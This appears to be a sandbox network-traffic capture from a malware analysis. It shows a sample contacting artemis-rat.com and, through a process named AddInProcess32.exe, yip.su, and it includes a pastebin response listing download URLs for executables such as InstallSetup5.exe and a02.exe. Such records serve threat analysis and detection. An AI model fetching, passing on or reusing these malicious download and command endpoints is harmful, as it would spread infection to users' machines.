                                                                                                                                                                                                                                                            2024-03-11 02:30:36 UTC1370INData Raw: 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 74 72 61 63 65 2d 70 61 72 73 65 72 5f 64 69 73 74 5f 73 74 61 63 6b 2d 74 72 61 63 65 2d 70 61 72 73 65 72 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 72 6f 2d 61 34 63 31 38 33 2d 37 39 66 39 36 31 31 63 32 37 35 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69
                                                                                                                                                                                                                                                            Data Ascii: ps://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://gi
                                                                                                                                                                                                                                                            2024-03-11 02:30:36 UTC1370INData Raw: 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6f 6d 62 6f 62 6f 78 2d 6e 61 76 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6d 61 72 6b 64 6f 77 6e 2d 74 6f 6f 6c 62 61 72 2d 65 2d 38 32 30 66 63 30 2d 62 63 38 66 30 32 62 39 36 37 34 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72
                                                                                                                                                                                                                                                            Data Ascii: " defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js"></script><script crossorigin="anonymous" defer
                                                                                                                                                                                                                                                            2024-03-11 02:30:36 UTC1370INData Raw: 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 38 35 37 34 35 33 30 61 36 63 64 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f
                                                                                                                                                                                                                                                            Data Ascii: fer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-8574530a6cd5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendo
                                                                                                                                                                                                                                                            2024-03-11 02:30:36 UTC728INData Raw: 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 37 32 63 39 66 62 64 65 35 61 64 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 64 69 6d 65 6e 73 69 6f 6e 73 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 74 6d 6c 5f 6c 69 62 5f 69 6e 64 65 78
                                                                                                                                                                                                                                                            Data Ascii: ert_index_js-72c9fbde5ad4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index
                                                                                                                                                                                                                                                            2024-03-11 02:30:36 UTC1370INData Raw: 35 44 31 34 0d 0a 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 74 61 73 6b 2d 6c 69 73 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6f 6e 66 6f 63 75 73 5f 74 73 2d 61 70 70 5f 61 73 73 2d 34 32 31 63 65 63 2d 39 64 65 34 32 31 33 30 31 35 61 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                                                                            Data Ascii: 5D14><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_onfocus_ts-app_ass-421cec-9de4213015af.js"></script>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1192.168.2.551394104.100.78.158443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:39 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                                                                            2024-03-11 02:30:39 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                            Server: ECAcc (sac/250E)
                                                                                                                                                                                                                                                            X-CID: 11
                                                                                                                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                            X-Ms-Region: prod-eus-z1
                                                                                                                                                                                                                                                            Cache-Control: public, max-age=60961
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            X-CID: 2


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2192.168.2.551964104.100.78.158443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:40 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                            Range: bytes=0-2147483646
                                                                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                                                                            2024-03-11 02:30:40 UTC530INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                            X-Azure-Ref: 0Fz4RYwAAAACZW8dCTzveR7lI76J6Z2l5U0pDRURHRTA1MTgAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                                                                                                                                                                                                                            Cache-Control: public, max-age=60939
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Length: 55
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            X-CID: 2
                                                                                                                                                                                                                                                            2024-03-11 02:30:40 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            3192.168.2.553550222.255.238.1594433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:44 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:44 UTC192INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            2024-03-11 02:30:44 UTC613INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.<


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            4192.168.2.555130104.21.54.1584433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:46 UTC223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:46 UTC161INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            2024-03-11 02:30:46 UTC155INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                            5192.168.2.555554104.20.68.143443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:52 UTC74OUTGET /raw/E0rY26ni HTTP/1.1
                                                                                                                                                                                                                                                            Host: pastebin.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:53 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:53 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            x-frame-options: DENY
                                                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                                                            x-xss-protection: 1;mode=block
                                                                                                                                                                                                                                                            cache-control: public, max-age=1801
                                                                                                                                                                                                                                                            CF-Cache-Status: MISS
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:53 GMT
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820056e120ad7-LAS
                                                                                                                                                                                                                                                            2024-03-11 02:30:53 UTC800INData Raw: 33 31 39 0d 0a 68 74 74 70 3a 2f 2f 31 38 35 2e 31 37 32 2e 31 32 38 2e 31 32 36 2f 49 6e 73 74 61 6c 6c 53 65 74 75 70 35 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 62 69 74 62 75 63 6b 65 74 2e 6f 72 67 2f 6a 2d 75 70 73 70 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 6e 65 74 77 6f 72 6b 31 2f 64 6f 77 6e 6c 6f 61 64 73 2f 61 30 32 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 73 68 69 70 6f 66 64 65 73 74 69 6e 79 2e 63 6f 6d 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 73 74 79 2e 69 6e 6b 2f 70 70 67 38 78 0d 0a 68 74 74 70 73 3a 2f 2f 6e 61 6d 65 6d 61 69 6c 2e 6f 72 67 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31
                                                                                                                                                                                                                                                            Data Ascii: 319http://185.172.128.126/InstallSetup5.exehttps://bitbucket.org/j-upsps/microsoft_network1/downloads/a02.exehttps://shipofdestiny.com/baf14778c246e15550645e30ba78ce1c.exehttps://sty.ink/ppg8xhttps://namemail.org/6779d89b7a368f4f3f340b50a9d18d71
                                                                                                                                                                                                                                                            2024-03-11 02:30:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            6192.168.2.555562172.67.169.8944344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:53 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: yip.su
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC898INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:53 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            memory: 0.36199188232421875
                                                                                                                                                                                                                                                            expires: Mon, 11 Mar 2024 02:30:53 +0000
                                                                                                                                                                                                                                                            strict-transport-security: max-age=604800
                                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: EXPIRED
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 13:56:44 GMT
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5lluPna3WPbvKwVifapt0MRIa1opUa7OzY9%2BsISIG%2BwbDXmgizIdYAc6HHHYb4O8QhD5auQfixTLegob9idrj2hoyMl18J9aNIXokonwhO35AdGGaO14Xi4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 86282007597709fb-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC471INData Raw: 31 64 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                                                                                                                                                                                                                            Data Ascii: 1d16<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72
                                                                                                                                                                                                                                                            Data Ascii: r" content="7 days" /><meta name="keywords" content="" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property="og:image" content="https://cdn.iplogger.or
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC1369INData Raw: 6e 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 7b 68 65 69 67 68 74 3a 31 36 70 78 3b 77 69 64 74 68 3a 31 36 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69
                                                                                                                                                                                                                                                            Data Ascii: ne}#loader>span{height:16px;width:16px;border-radius:50%;background-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;ani
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC1369INData Raw: 72 69 70 74 3e 0a 09 76 61 72 20 5f 70 3b 0a 09 69 66 28 6e 61 76 69 67 61 74 6f 72 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                            Data Ascii: ript>var _p;if(navigator&&navigator.userAgentData&&navigator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(
                                                                                                                                                                                                                                                            2024-03-11 02:30:54 UTC1369INData Raw: 6f 72 65 20 70 72 6f 63 65 73 73 69 6e 67 2e 2e 2e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 5f 63 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79
                                                                                                                                                                                                                                                            Data Ascii: ore processing...</div></div> <script> _c();</script><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify
